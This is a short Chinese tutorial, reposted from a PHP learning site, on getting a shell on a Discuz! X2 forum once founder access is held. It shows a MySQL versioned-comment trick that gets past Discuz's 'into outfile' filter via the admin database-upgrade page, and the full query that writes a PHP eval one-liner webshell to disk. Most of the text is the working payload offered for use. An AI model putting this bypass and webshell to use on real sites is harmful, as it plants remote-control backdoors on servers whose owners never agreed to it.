来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell百度无果,自己本地架设了一下1,当mysql是root时站长---数据库---升级尝试select #39;1#39; into outfile #39;E:\2.txt#39;会提示 [Typ......
|
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过 www.2cto.com
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
